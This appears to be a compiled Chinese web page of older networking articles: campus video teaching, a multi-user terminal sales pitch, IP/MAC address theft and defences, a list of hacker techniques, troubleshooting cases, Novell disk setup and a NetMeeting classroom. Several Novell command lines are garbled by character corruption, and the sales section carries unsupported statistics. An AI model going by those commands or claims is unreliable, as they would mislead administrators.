    网上课堂直播教学方案，充分利用校园网络的资源，籍着优异的影音传送技术，以及高品质、高画质的影音服务，将课堂上老师的讲解、示范、实验传递到校园网络的各个角落。

    传统的课堂教学，以老师授课为主，示范、实验演示为辅，老师经过精心的备课后，把书本上的知识通过课堂传授给学生。现在，您可以通过网上课堂直播教学方案，将一位老师辛勤的课堂授课，实时、流畅地传递到其他教室，让更多的学生参与学习，让别的老师、领导进行实时观摩而不妨碍正常授课。这样，不但可以节省老师在示范、实验演示所需要的教学成本，还可让老师有更多的时间去提高教学质量，而不用花时间、精力反复地传授同一教学内容。

    由此可见，网上课堂直播教学对于实施现代远程教育工程，有着极为重要的意义。

    网上课堂直播可以分为校内课堂直播教学、远程课堂直播教学、卫星课堂直播教学。

    五、 网上课堂

    点播教学方案

    网上课堂点播教学方案，将课堂上的老师讲解、示范和课程实验摄制下来，利用视频点播技术(Video On Demand)，在校园网络实现课堂教学点播。学生可以结合自己的实际学习情况，反复聆听尚未掌握的课堂内容；对于那些优异的学生，可以选修多门课程，而不必受学校排课冲突影响；学生因故未能按时上课的，也可以在课后随时进行补课，而且是由“原版老师”补课。

    网上课堂点播教学方案和网上课堂直播教学方案的整合，可以实现纯数字化的影音品质，不会因录影带的转录而造成图像损失，且大大缩短课堂教学影音的制作周期。

    网上课堂点播教学的实现，可以使学生在校园网内的任何一台多媒体电脑上选播课堂教学内容。通过卫星接入和ADSL接入，真正实现远程课堂教学。考虑到目前宽带网络接入的费用投资，网上课堂点播教学方案整合VideoFinder分布式资源数据库系统，在目前的互联网络带宽下，实现资源数据远程分布缓冲，保证远端教室网上课堂点播教学中的服务品质。

    网上课堂点播可以分为校内课堂点播教学、远程课堂点播教学、卫星课堂点播教学。

    下面详细介绍卫星课堂点播教学方案：

    适用范围： 在校园与校园之间实现网上课堂点播教学

    方案特点： 实现视讯资料分布储存，后端自动转储，AV视讯数字压缩，

    Web界面集成

    系统整合： 中心机房VideoFinder服务器

    分校中心机房VideoFinder服务器选用HP NetServer LH6000

    VideoFinder多媒体随选视讯系统

    VideoFinder资源数据库管理系统

    Mpegator视频制作系统

    Microsoft IIS Web Server

    Microsoft Media Service

    系统架构如图2

    六、 校园网多媒体网络教学综合解决方案

    校园网多媒体网络教学解决方案，融合“多媒体(视听)电脑网络室”、“多媒体视听数字图书(阅览)馆”、“多媒体可视化数字语音(言)教学”、“VideoCast网上课堂直播教学”和“网上课堂点播教学”，充分挖掘校园网络基础设施的潜能，有效地发挥现有的教学资源，让老师和学生通过校园网络，掌握和运用先进的多媒体网络教学工具，更有效地教授和学习。

    校园网多媒体网络教学解决方案运用现有的师资力量，通过现代化的教育手段，让更多的、校园外的、对知识强烈渴望的人们，来到我们的课堂，补充新知。方案提供了实时的网上课堂直播，同时也提供了随时随地的网上课堂点播，以适应终身学习和知识更新的需要，以适应非学历教育和继续教育的需要。

    校园网多媒体网络教学解决方案中，为实施多媒体远程教学，整合了先进的网络互联技术，如卫星接入、ADSL接入、CABLE接入等；同时也整合了信息检索(Web Proxy)、信息发布(Web)和信息交流(Email)等Internet应用，以及学籍管理、教工管理等应用系统。

返回


多人共享计算机系统集成解决方案

《一键清理系统垃圾》

多人共享计算机系统集成解决方案

42个人的例子

全PC局域网

1.　　　　需要一台服务器, 42个工作站, 工作站具备硬盘, 每台主机须网卡通过局域网连接

2.　　　　计算机教室投资有限，不可能购买高档次的PC机

3.　　　　整个网络的数据往返于工作站与服务器之间,加大了网络的数据传递量,大大的影响了工作站

的速度和效率.

4.　　　　总投入成本100%, 维护及升级成本100%

无盘工作站局域网

1.　　　　　需要一台服务器, 42个工作站, 工作站不具备硬盘

2.　　　　　工作时将程序从服务器取到工作站上，运行的结果通过网络储存在服务器上

3.　　　　　所有应用系统都在服务器上运行, 整个网络的数据往返于工作站与服务器，加大了网络的数

据传递，大大影响了工作站的速度和效率．无法平顺运行即时高阶影音.

4.　　　　总投入成本80%, 维护及升级成本100%

MCT MMU 2000-XP系统解决方案

1.　　　　仅用6台PC主机

2.　　　　六台主机之间用网卡通过局域网相连 (每台主机上增加到7个用户)

3.　　　　所有的进程处理全部在主机上完成，运行的结果也储存在主机上，可以主机的性能高速运行，

不增加网络的负担，局域网的效率很高

4.　　　　总投入成本不到40%, 维护及升级成本仅15%

采用MCT MMU 2000-XP的优势

MCT MMU 2000-XP终端机包含显示器、显卡、键盘、鼠标或耳麦，不需增加网卡、CPUfs、
电源、机箱，不需特殊的USB键盘、鼠标或耳麦，节省很大的成本。MCT MMU 2000-XP终端的性能是
随着主机的升级而提升的，终端本身不会被淘汰。

比如：用户花20000元买了7台低档过时计算机(每台不到3000元的价值)，得到的只是7台国外已停

产的计算机，而用户花7000元买一台高档计算机，再花12000元（概数）买6台MCTs Multimedia

Multi-User 2000-XP及显示器，得到的将是7台高档计算机，同样是投资，得到的是相同数量的

不同档次的计算机计算机，计算机系统可以3-5年不被淘汰，淘汰时升级主机，则整个系统的性能

完全提升；低档PC从购买时就是淘汰产品，难以保证长久的应用.

另可: 利用MCT MMU 2000-XP改造旧有计算机教室

旧有计算机教室只需添加少量学生“主机”，整个教室的性能则焕然一新。或将一个教室变
三个教室.

价格性能对照表

比较项目
标准PC
无盘工作站
MCT/MMU2000-XP

硬件设备
7台主机+7台显示器
一台服务器+7台无盘工作站+7台显示器
一台主机+7台显示器

网络设备及配线
7块网卡+7条配线+一台8口集线器
7块网卡+7条配线+一台8口集线器
一块网卡+一条配线

3D影音及时传输
可以
无法达成
可以

所有软件共享
不可以
部分可以
完全可以

投入成本比较
100%
80%
40%

MCT MMU 2000-XP答客问

1.　　　　会使我的计算机的计算速度变慢吗？

不会！当前的计算机性能优越，资源富余很多，大多数软件对计算机的要求并不高，有权威的调查

表明，90%以上的人只使用了计算机10%的资源，而有90%的性能无法充分发挥，用户根本不会感觉到

使用了MCT MMU 2000-XP后与平时有什幺差别。

2.　　　　MCT MMU 2000-XP允许同时观看浏览视频影像，欣赏音乐吗？

作为 MCT MMU 2000-XP用户，你可以观看任何格式的视频影像，并且你还可以同时播放相同或不同

的VCD/DVD/MPEG4/MP3等视频音频，只需接上一般音箱即可（不需要USB音箱）你也可以接一般

的麦克风进行录音（不需要USB麦克风）省很多!

3.　　　　多个用户可以上网冲浪吗？

可以，所有的用户可以在同一时间上网冲浪，并且只需要一条电话线，一个MODEM，一个互连网帐

号和一个IP地址。

4.　　　　MCT MMU 2000-XP用户可以共享主机的外设资源吗？

可以，所有的用户可以在原有的习惯下，使用主机的各类外部设备。

5.　　　　每个人可以拥有自己的E-mail地址吗？

可以，并且还可以拥有自己保密的E-mail地址。

6.　　　　每个人的文件资料安全吗？

非常安全，使用windows2000/XP的用户资源管理器和本地安全策略，可以使用户的文件及个人资

料达到非常高的安全标准。

7.　　　　是否可以针对每个用户及每个用户的资料有不同权限的管理？

可以，根据Windows2000/XP的NTFS文件格式以及活动目录及其组的概念可以做到对每个用户及每

个用户的文件资料进行不同权限的访问管理。

MMU 2000/XP 单机一对七架构图

42人教室示意图）

       教师机

┇

           集线器

                                                                                ┇┇┇┇┇┇

                                                               ┇

                                                                                ┇

                                                                                ┇

                                                                                ┇

                                                                                ┇

                                                                                ┇

返回


分析并解决局域网内盗用IP的安全问题

《一键清理系统垃圾》

分析并解决局域网内盗用IP的安全问题

一、IP地址盗用方法分析

    IP地址的盗用方法多种多样，其常用方法主要有以下几种：

    1、静态修改IP地址

    对于任何一个TCP/IP实现来说，IP地址都是其用户配置的必选项。如果用户在配置TCP/IP或修改TCP/IP配置时，使用的不是授权机构分配的IP地址，就形成了IP地址盗用。由于IP地址是一个逻辑地址，是一个需要用户设置的值，因此无法限制用户对于IP地址的静态修改，除非使用DHCP服务器分配IP地址，但又会带来其它管理问题。

    2、成对修改IP-MAC地址

    对于静态修改IP地址的问题，现在很多单位都采用静态路由技术加以解决。针对静态路由技术，IP盗用技术又有了新的发展，即成对修改IP-MAC地址。MAC地址是设备的硬件地址，对于我们常用的以太网来说，即俗称的计算机网卡地址。每一个网卡的MAC地址在所有以太网设备中必须是唯一的，它由IEEE分配，是固化在网卡上的，一般不能随意改动。但是，现在的一些兼容网卡，其MAC地址可以使用网卡配置程序进行修改。如果将一台计算机的IP地址和MAC地址都改为另外一台合法主机的IP地址和MAC地址，那静态路由技术就无能为力了。

    另外，对于那些MAC地址不能直接修改的网卡来说，用户还可以采用软件的办法来修改MAC地址，即通过修改底层网络软件达到欺骗上层网络软件的目的。

    3、动态修改IP地址

    对于一些黑客高手来说，直接编写程序在网络上收发数据包，绕过上层网络软件，动态修改自己的IP地址(或IP-MAC地址对)，达到IP欺骗并不是一件很困难的事。

    二、防范技术研究

    针对IP盗用问题，网络专家采用了各种防范技术，现在比较通常的防范技术主要是根据TCP/IP的层次结构，在不同的层次采用不同的方法来防止IP地址的盗用。

    1、交换机控制

    解决IP地址的最彻底的方法是使用交换机进行控制，即在TCP/IP第二层进行控制：使用交换机提供的端口的单地址工作模式，即交换机的每一个端口只允许一台主机通过该端口访问网络，任何其它地址的主机的访问被拒绝。但此方案的最大缺点在于它需要网络上全部采用交换机提供用户接入，这在交换机相对昂贵的今天不是一个能够普遍采用的解决方案。

    2、路由器隔离

    采用路由器隔离的办法其主要依据是MAC地址作为以太网卡地址全球唯一不能改变。其实现方法为通过SNMP协议定期扫描校园网各路由器的ARP表，获得当前IP和MAC的对照关系，和事先合法的IP和MAC地址比较，如不一致，则为非法访问。对于非法访问，有几种办法可以制止，如：

    a.使用正确的IP与MAC地址映射覆盖非法的IP-MAC表项；

    b.向非法访问的主机发送ICMP不可达的欺骗包，干扰其数据发送；

    c.修改路由器的存取控制列表，禁止非法访问。

    路由器隔离的另外一种实现方法是使用静态ARP表，即路由器中IP与MAC地址的映射不通过ARP来获得，而采用静态设置。这样，当非法访问的IP地址和MAC地址不一致时，路由器根据正确的静态设置转发的帧就不会到达非法主机。

    路由器隔离技术能够较好地解决IP地址的盗用问题，但是如果非法用户针对其理论依据进行破坏，成对修改IP-MAC地址，对这样的IP地址盗用它就无能为力了。

    3、防火墙与代理服务器

    使用防火墙与代理服务器相结合，也能较好地解决IP地址盗用问题：防火墙用来隔离内部网络和外部网络，用户访问外部网络通过代理服务器进行。使用这样的办法是将IP防盗放到应用层来解决，变IP管理为用户身份和口令的管理，因为用户对于网络的使用归根结底是要使用网络应用。这样实现的好处是，盗用IP地址只能在子网内使用，失去盗用的意义；合法用户可以选择任意一台IP主机使用，通过代理服务器访问外部网络资源，而无权用户即使盗用IP，也没有身份和密码，不能使用外部网络。

    使用防火墙和代理服务器的缺点也是明显的，由于使用代理服务器访问外部网络对用户不是透明的，增加了用户操作的麻烦；另外，对于大数量的用户群(如高校的学生)来说，用户管理也是一个问题。


服务器安全指南

《一键清理系统垃圾》

服务器安全指南

    在网络服务器中，通常都会存有好多并不公开或提供下载的文件或程序，这些资料多数是某个公司或是政府机关的机密文件，也可能是某个程序员的程序源代码。由此可以看出，一台服务器的安全是十分重要的。

    许多上网用户可能不太明白网络服务器的具体用途，其实用户在网络里浏览网站、收发电子邮件、玩网络游戏等，都是由网络服务器提供的服务。当一个用户浏览某个网站时，首先会在地址栏里输入一个网址(例如www.cnsker.com)，这时，浏览器会向一台域名服务器发送请求，而这台域名服务器将在数据库内找到这个域名所对应的IP地址，随后向这条IP所对应的服务器转送请求，并把其位置告诉网站服务器。当网站服务器收到信息后，将会把用户所需要的资料反馈给用户的浏览器，这样用户便可以浏览被反馈回来的内容。如果网络服务器没有在数据库中找到域名所对应的IP或没有找到可以反馈的资料，那么网络服务器将向浏览器发送一条指令，随后用户的浏览器会在本地找到相对应的出错显示页面(如：该页无法显示)。这就是网络服务器最常见的作用。

    常用手段

    很多时候黑客都会把网络服务器当作他们的攻击目标，通过进入网络服务器来达到他们的目的。要进行有效地阻止，就需要先了那些黑客是用什么手段来进入网络服务器的，知道他们的攻击方法后，才能有效地解决这些安全隐患。

    先来介绍一下黑客常用的手段：

    1. 网络扫描——在Internet上进行广泛搜索，以找出特定计算机或软件中的弱点。

    2. 网络嗅探程序——查看通过Internet的数据包，以捕获口令或全部内容。通过安装侦听器程序来监视网络数据流，从而获取连接网络系统时用户键入的用户名和口令。

    3. 拒绝服务——通过反复向某个Web站点的设备发送过多的信息请求，导致该设备无法完成应有的网络服务项目(例如电子邮件系统或联机功能)，称为“拒绝服务”问题。

4. 欺骗用户——伪造电子邮件地址或Web页地址，从用户处骗得口令、信用卡号码等。欺骗是用来骗取目标系统，使之认为信息是来自或发向其所相信的目的的过程。欺骗可在IP层及之上发生（地址解析欺骗、IP源地址欺骗、电子邮件欺骗等）。当一台主机的IP地址假定为有效，并为Tcp和Udp服务所相信，利用IP地址的源路由，一个攻击者的主机可以被伪装成一个被信任的主机或客户。

5. 特洛伊木马——一种用户察觉不到的程序，其中含有可利用一些软件中已知弱点的指令。

6. 后门——为防原来的进入点被探测到，留几个隐藏的路径以方便再次进入。

7. 恶意小程序——微型程序，修改硬盘上的文件，发送虚假电子邮件或窃取口令。

8. 竞争拨号程序——能自动拨成千上万个电话号码以寻找进入调制解调器连接的路径。逻辑炸弹是计算机程序中的一条指令，能触发恶意操作。

9. 缓冲器溢出——向计算机内存缓冲器发送过多的数据，以摧毁计算机控制系统或获得计算机控制权。

10. 口令破译——用软件猜出口令。通常的做法是通过监视通信信道上的口令数据包，破解口令的加密形式。

11. 社交工程——与公司雇员谈话，套出有价值的信息。

12. 垃圾桶潜水——仔细检查公司的垃圾，以发现能帮助进入公司计算机的信息。


服务器常见故障的诊断与解决

《一键清理系统垃圾》

服务器常见故障的诊断与解决

    网络管理员90%的工作往往是诊断和解决各种各样的故障。虽然说没有人喜欢麻烦，但麻烦总是自己找上门来。只有拥有高超的诊断技能，你才能在紧急情况下迅速响应，保障网络流畅地运行。当你面临网络故障的挑战时，首先向自己问几个简单的问题：有哪些地方被改变了？这个问题以前遇到过吗？如果是，是什么时候？是否有可能让问题再次出现？用户做了什么特别的操作吗？其他用户有没有遇到过同样的问题？
    接下来尝试隔离问题，每次排除一部 分可能引起该问题的因素，逐步找出问题的真正根源。例如，如果一个工作站不能连接到服务器，那就先确定是网络问题还是工作站本身的问题。如果能够迅速地肯定问题出在工作站本身，你就排除了一大半可能导致问题的因素，向真正的故障根源接近一大步了。即使你最终拿不出解决办法，不得不寻找外援，隔离问题也会节省你大量的时间。

    为了说明诊断网络故障的一般过程，本文例举了几种故障情形，有的是常见的小问题，有的是比较艰巨的挑战。当你遇到类似的问题时，就可以按照本文例子的介绍，先问自己几个简单的问题，逐步隔离问题所在，最后找到真正的问题根源。

    一、找不到验证密码的域服务器

    毫无疑问，你也一定遇到过这样的情形：当你坐在一台工作站之前准备登录网络，Windows却报告说找不到用来验证密码的域服务器。要解决这个故障，首先要确定问题到底出在网络、工作站还是服务器上。从下面几个问题开始：

    →哪些地方改变了？最近是否改动过网络，而这些改动可能导致当前的问题？有没有添加新的服务器、拆除原有的服务器、改动过交换机或HUB？有没有添加或减少域控制器、将成员服务器提升为DC（域控制器）或者相反？

    →其他工作站也存在类似的问题吗？

    →服务器正在运行吗？

    经过检查，你发现此前工作站一直顺利地运行，其他工作站没有遇到类似的问题，服务器也正常。根据故障现象，基本上可以确定故障出在工作站本身。接下来要确定工作站的那个地方出了故障，试试下面几个问题：

    →工作站能够Ping到服务器吗？

    →工作站获得了一个IP地址吗？

检测表明，工作站能够Ping到服务器，但Ping操作有时超时，这表明工作站和服务器之间只有断断续续的通信。在命令行上执行ipconfig /renew命令，多执行几次，工作站有时会更新IP地址，有时不会。这是工作站和服务器之间断续通信的症状。
    现在将问题工作站的网络连接和另一台工作站的对换一下，新工作站在问题工作站的位置上也不能连接网络，而问题工作站却能从另一个网络位置顺利地连接网络。现在已经很清楚：问题工作站所在位置的电缆或Hub出了问题。

    拆下故障位置上网络电缆连接Hub的那一端，将它接到另一个Hub上，故障依旧。现在可以肯定电缆就是引起故障的罪魁祸首了。

    二、Windows服务不能启动

    在一台Windows 2000服务器上，部分服务设置成不用本地的系统帐户启动。一次重新启动Windows 2000服务器之后，发现这些服务没有启动，必须手工打开服务，重新输入密码，然后启动服务。每次重新输入密码，都收到消息说：<用户名字>已被授予作为服务登录的权限。

    要解决该故障，首先回答下面几个问题：

    →哪些地方改变了？是否有人修改了服务器？

    →这个服务以前能够启动吗？

    →用户名称和密码正确吗？

    查询修改记录发现，该服务器是一个DC，不久之前还是域控制器组织单元（OU，Organizational Unit）的成员。在移出该OU之前，这些服务一直能够顺利启动。另外，用来启动这些服务的用户名称和密码都是合法的。进一步研究发现，域控制器OU的成员有一些特殊的权限，其中包括作为服务登录的权限。当出现问题的服务器移出该OU时，服务器失去了那些权限。现在要做的是恢复服务器的权限。

    要将权限授予服务器，请按照如下步骤操作：

    →在管理控制台（MMC）中打开活动目录用户和计算机管理单元，再打开域控制器OU的“属性”对话框。

    →在组策略页中，点击“默认域控制器策略”，然后点击“编辑”，打开组策略管理器。

    →依次扩展计算机配置/Windows设置/安全设置，再扩展“本地策略”，然后点击“用户权利指派”。

    →在右边的窗格中，右击“作为服务登录”，选择菜单“安全”。

    →把用来启动服务的用户帐户加入到策略，完成后点击“确定”。

    有关该问题的更多资料，请参见微软的文章“如何解决服务启动权限问题”（http://support.microsoft.com/?kbid=259733）。

三、无法收到外面发来的邮件
    单位用Exchange 2000 Server作为内部和外部的邮件服务器。有一天原来的ISP不能再提供服务了，所以你迅速换了一个新的ISP。用户仍旧能够照常访问Internet，却收不到外面来的邮件。不过，发出去的邮件看来没有问题。

    要排解这一故障，第一个要问的问题是：

    →在改变ISP之前，邮件系统工作正常吗？

    要确定Exchange Server是否正常工作，防火墙配置是否正确，可以从Internet连接到Exchange Server 25端口（具体操作办法，请参见微软文章：Telnet 到 IMC 的端口 25 以测试 IMC 通信， http://support.microsoft.com/?kbid=153119），发送一个测试消息，确认服务器和防火墙都在正常运行。故障的原因很可能是因为改变ISP。

    再回答下面这个问题：

    →域名信息正确转移到了新的ISP吗？

    用Nslookup工具，测试一下是否能够找到域的邮件交换（MX）记录，结果却什么也没有找到。根据这一现象，可以推断在更换ISP时，域名注册公司没有正确转移域名信息。现在你可以联系域名注册公司，要求登记MX记录，以及将域名信息正确转到新的ISP。只要MX记录在Internet上一传播开，Exchange Server又可以收到外面来的邮件了。

    四、网络上看不到服务器

    Win2K Pro工作站遇到了奇怪的问题：偶尔能够看到Win 2K Server，但大部分时间里服务器就象从网络上消失了一样。在排解这一网络故障的过程中，首先要回答的问题是：

    →过去出现过该故障吗？

    →是否所有的工作站都出现相同的情况？

    经调查后发现，这一故障现象自服务器从 Windows NT 4.0升级到Win2K就开始存在了，网络上的所有工作站都出现同样的现象。现在要确定的是：故障的根源是服务器呢，还是网络。

    登录一个工作站，打开命令控制台，执行ping/pathping命令来连接服务器。结果发现，Ping服务器的IP地址没有问题，但却Ping不到服务器的名字。可以肯定，故障的原因是名称解析或DNS错误。

    接下来执行ipconfig/all，注意到工作站上DNS服务器指向了ISP的DNS服务器。Win2K将DNS作为其基本的名称解析机制，但现在工作站却用ISP的DNS服务器来解析本地网络的Win2K服务器名称。当工作站向ISP的DNS服务器查询Win2K服务器名称时，只能得到超时错误，导致Win2K服务器从网络上隐身了。要解决该故障，必须把主DNS服务器指向内部的Win2K DNS服务器，让内网的工作站向Win2K DNS服务器查询本地服务器名称。

    首先证实Win2K服务器上确实已经安装了DNS服务，且DNS服务在正常运行，然后修改Win2K DNS服务器IP地址指向它自己。接下来利用DNS管理器，验证DNS服务器位于根位置，且已经启用转发。启用转发之后，就可以解析非本地的任何IP地址了。不要忘记将ISP的DNS服务器输入转发栏。最后配置一下服务器上的DHCP，将DNS服务器从ISP的改成Win2K服务器，刷新工作站上的IP地址。现在网络已经能够稳定地运行了。有关在这类环境下配置DNS的信息，请参见微软的文章“HOW TO：配置 DNS 以访问 Internet”（http://support.microsoft.com/?kbid=300202）。

五、LAN连接到多个WAN
    不久前在A市安装了一个LAN，它有两个WAN连接，其中一个连接通向私有的帧中继网络，另一个连接通向Internet，这是为了防止出现故障和提高性能（图二显示了网络结构）。现在出现的故障是：A市的用户有时不能顺利访问B市的服务器。

要解决该故障，首先要搞清楚下面两个问题：

    →故障何时出现？

    →默认网关是什么？

    故障出现是间歇性的。在A市的DHCP配置中，默认网关是192.168.1.11（即防火墙）。由于A市LAN里面的所有机器都会出现同样的故障现象，所以问题很可能出在A市网络上的全局性路由配置上。

    在防火墙上有一条静态路由，从192.168.2.0（掩码255.255.255.0）到192.168.1.10，用Route Print可以验证这一规则。A市服务器有时可以Ping到B市的服务器，但有时不能。运行Tracert，结果如图三所示，它显示出了数据包应当通过的路径。但有的时候，运行Tracert却显示出数据包在第一个跃点（192.168.1.11）之后遇到超时错误。根据这一现象，可以推测防火墙没有可靠地将数据包转发到控制192.168.2.0通信的Cisco路由器。

查阅防火墙的日志，可以看到数据包有时被禁止转发到192.168.1.10，虽然存在这样一条转发规则也无济于事。防火墙的种类很多，但大多数防火墙厂商都反对将防火墙当作路由器，如果防火墙被攻击者劫持，有关WAN连接的大量信息就会泄露。

    因此现在要重新配置网络，使用默认的网关192.168.1.10（即路由器），执行命令Ip route 0.0.0.0 0.0.0.0 192.168.1.11在路由器上建立一个默认的路由。用户访问Internet时先通过路由器，再穿越防火墙。

    如果A市的路由器（192.168.1.10）出现故障，会对Internet访问产生哪些影响？如果帧中继网络失效，但Internet连接仍正常，情况又如何？一旦A市的路由器故障，Internet连接也会丢失，这是因为默认的网关指向了该路由器，该路由器故障导致数据包不能转发到防火墙。在A市，将DHCP默认网关配置成防火墙可以恢复Internet连接，当然，在恢复A市路由器之前，其他地区的私有WAN和Internet访问仍旧无效。

六、工作站不能连接网络
    办公大楼五楼的工作站看不到服务器，也不能访问Internet。故障间歇性出现。首先要搞清楚的问题是：

    →故障出现多长时间了？

    →有哪些地方被改变了？

    经Pathping工具测试，检测到一些数据包丢失错误。问题看来可以归结到五楼之内。

    利用信号发生器或线缆扫描器追踪故障，跟踪网络连接一直到了六楼的Ethernet交换机，五楼和六楼共用该交换机。考虑到可能是交换机端口故障，所以将端口和六楼的一台机器对换了一下，但故障仍旧存在，而且仍只出现在五楼的工作站上，由此推断，交换机应该没有问题。

    返回五楼，注意到一个办公室里有个五口的小Hub。进一步查看，注意到还有四个小Hub菊形相连。现在故障的根源找到了。在100 Base-T Ethernet中，每个网络只能有一个Class I转发跃距（0.7毫秒延迟），或者两个Class II转发跃距（0.4毫秒延迟）（由于这个原因，所以不推荐在重要场合使用大量小Hub）。现在拆除所有小Hub，将线头直接接到六楼的交换机，故障消失。

    总地来说，不能认为靠死记硬背就能够解决所有常见的网络问题，相反地，应当以开放的心态审视每一种故障现象，从几个简单的问题开始，逐步排除可能的故障原因。记住，隔离问题是迅速排解故障的关键所在。

    七、附录：常用网络诊断工具

    Windows XP和Windows 2000提供了许多基本的网络检测工具：

    ■ Pathping

    Pathping用来检验是否能够联系到指定的主机。命令行语法是：pathping <IP地址，或主机名字>。pathping将显示出数据包丢失情况的基本信息。

    ■ Ipconfig

    Ipconfig命令用来显示出工作站的IP配置。命令行语法是：ipconfig /all。通过ipconfig命令的运行结果，至少可以：

    →验证工作站具有正确的IP地址和子网掩码。错误的IP地址和子网掩码会导致连接出错。 →如果启用了DHCP，则可以验证工作站已经租到了一个IP地址。如果不能获得IP地址，则表明与DHCP服务器联系方面出了问题。

    →验证默认的网关。如果网关错误，连接远程网络或Internet时就会出现问题。

    →验证DNS服务器。XP和Win 2K依靠DNS进行名称解析。一般地，工作站应当指向一台Win 2K服务器以获得DNS解析。

    ■ Nslookup

    Nslookup即名称服务器查找（Name Server Lookup），用来查找DNS服务器上的DNS记录。命令语法：nslookup。在前文的例子中，我们用NSLookup来验证邮件交换（MX）记录，排解Internet邮件传送问题。

    ■ Route Print

    Route Print命令显示出本地机器上的路由规则。这个工具和Ping、Tracert以及Pathping命令结合很有用，能够帮助确定数据包通过的路由器。命令语法是：route print。另外，利用Route Add可以将静态路由规则加入到服务器或工作站。


给Novell文件服务器加装一个硬盘

《一键清理系统垃圾》

给Novell文件服务器加装一个硬盘

    Novell解决方案在局域网应用中十分普遍，大多数用户通过Novell文件服务器方便地实现了文件的共享。随着时间的推移，应用的加深，原文件服务器所配的硬盘容量不够用是很多用户会遇到的问题。在本文中，我作为一个用户把解决该问题的过程记录下来，与同行分享。
     一、硬盘的安装
    硬盘接口有ATBUS与SCSI之分，ATBUS的软硬盘控制卡只能接2台硬盘，若要接2台以上的硬盘时，则软硬盘控制卡要换成SCSI卡。安装前要按照厂家的说明进行适当的跳线，ATBUS接口的硬盘从盘按Slave的提示跳线，SCSI接口的硬盘依次令每台硬盘的SCSI—ID值为0，1，2……。SCSI电缆终端要接终端电阻。若是ATBUS硬盘，必须进行CMOS的设置。
     二、删除硬盘的DOS分区
    加装的硬盘只能有NetWare分区。如果这个硬盘过去在DOS环境下使用过，可用DOS中的FDISK命令，把原有的分区删掉。
     三、建立NetWare分区
    在服务器的“：”提示符下，键入“LOADINSTALL”命令，然后
    1．从“InstallationOptions”中选择“DiskOptions”；
    2．从“AvailableDiskOptions”中选择“PartitionTables”；
    3．再从“AvailableDiskOptions”中选择要分区的硬盘，回车确认；
    4．从“PartitionOptions”中选择“CreateNetWarePartition”，显示“PartitionInformation”窗口，给出NetWare分区中信息区域和重定位区域的大小，可根据需要改变这个值。当然，只可改小不可改大；
    5．按“Esc”键，逐级退回到主菜单。
     四、定义卷标
    1．在INSTALL的主菜单“InstallationOptions”中选择“VolumeOptions”；
    2．在“Volumes”窗口中按“Insert”键，可在NetWare分区的可用空间建立新的卷，指定卷名与大小。
    在一个硬盘上可建立一个卷，也可建立多个卷，建立多个卷只需重复第2步即可。
     五、安装卷
    运行sys卷public子目录下syscon程序，在“AvailableTopics”菜单下选择“supervisoroptions”，再选“EditSystemAUTOEXECFile”，加入“mountΙ新卷标名Λ”一行。
     六、映射卷
    运行syscon程序，在“AvailableTopics”菜单选择“UserInformation”，在“UserNames”中选择要使用新卷的用户名，再在“UserInformation”中选择“LoginScript”，进入编辑状态，加入一行“MAP＊n：Κ〈新卷标名〉”或“MAPINSSn：ΚΙ新卷标名〉”，其中n可为1，2，3，……，根据情况而定。

返回


构 造 多 媒 体 教 室

《一键清理系统垃圾》

构 造 多 媒 体 教 室

       NetMeeting是微软公司的可视电子会议系统。Microsoft NetMeeting为全球用户提供了一种通过Internet 进行交谈、召开会议、工作以及共享程序的全新方式。NetMeeting具备以下多种功能：
①通过Internet或Intranet 向用户发送呼叫；②通过 Internet 或 Intranet 与用户交谈,同时能看见您呼叫的用户；③与其他用户共享同一应用程序；④在联机会议中使用白板画图；⑤检查快速拨号列表，看看哪些朋友已经登录；⑥发送在交谈程序中键入的消息；⑦在自己的 Web 页上创建呼叫链接；⑧向参加会议的每位用户发送文件。

本人利用NetMeeting的①、②、③、⑤、⑥项功能构造了一个经济适用的多媒体教室。在教学中图文并茂，深受学生的欢迎。

当前构造多媒体教室有两种方案：1购买现成的多媒体教室软硬件。2购买大屏幕投影仪。以上两种方案投资大（10～30万元），且第二种方案不能做到师生双向交流。下面我给大家介绍一种利用现有局域网构造多媒体教室的可行性方案。

一、 硬件环境

NT 4.0局域网，星型拓扑结构，学生机为有盘站且配置全双工声卡和耳机共10～25台，其中一台配置音箱和光驱作为教师机。

二、软件环境

学生机为Win 95或Win 98操作系统，并为之安装NetMeeting 2.11中文版，教师机还要安装Authorware多媒体制作系统。

三、NT服务器配置

1.安装TCP/IP协议，指定IP地址

如：192.168.202.1,子网掩码255.255.255.0。

2.启动DHCP 服务器服务

(1)在“控制面板”中，双击“服务”图标。

(2)在“服务”列表中，单击“Microsoft DHCP 服务”，然后单击“启动”。

3.连接 DHCP 服务器

(1)在“服务器”选单中，单击“添加”命令。

(2)键入 DHCP 服务器名或 IP 地址，然后单击“确定”。

4.启动“ DHCP 管理器”

单击“开始”，指向“程序”，然后指向“管理工具（公用）”，再单击“DHCP 管理器”。

5.创建新 DHCP 作用域

(1)在“DHCP管理器”窗口的“DHCP 服务器”列表中，选定要创建作用域的服务器。

(2)在“作用域”选单中，单击“创建”。

(3)要为该作用域定义可用 IP 地址范围，请在“起始地址”和“结束地址”框中键入 IP 地址范围的起始值和结束值如：192.168.202.10——192.168.202.60。

(4)在“子网掩码”框中，“DHCP 管理器”在“起始地址”和“结束地址”值的基础上提供子网掩码。除非需要不同值，否则接受该值。

(5)要指定该作用域中IP地址的租用时间，请单击“无限制”。

四、学生机配置

1.安装TCP/IP协议

选择“开始”→“设置”→“控制面板”→“网络”→“添加”→Microsoft→TCP/IP。重新启动计算机。设置TCP/IP属性为“自动获取IP地址”。

2.配置NetMeeting软件

运行NetMeeting，从选单中选择“工具”→“选项”，按以下图示设置各个标签选项(音频和视频选项卡取默认值)。

五、多媒体教室的应用

应用步骤：

(1)启动服务器，启动DHCP服务。

(2)启动教师机，登录上网，运行NetMeeting程序。用鼠标单击“呼叫”选单，选“主持会议”命令，主持会议。

(3)启动学生机，登录上网，然后点击“开始”→“程序”→“NetMeeting”打开NetMeeting应用程序。用鼠标单击“呼叫”选单，选“呼叫”命令，在地址窗输入教师机的计算机名如：kt00，呼叫方式选自动。

(4)在教师机上执行程序、多媒体教学光盘软件或Authorware多媒体课件，然后按Alt＋Tab键切换到NetMeeting，用鼠标单击工具栏上的“共享”按钮。共享应用程序并极小化NetMeeting应用程序。在学生机上同样极小化NetMeeting应用程序。这样教师机上的画面就同步显示在学生机上了，且声音可以通过教师机音箱播放，教师的操作也同步显示给学生。此教学方式经济适用、有声有色效果极佳。

(5)在多媒体教学过程，学生可通过NetMeeting交谈程序把问题发送给教师，并可通过“音频切换”按钮切换到教师机进行双向交流。

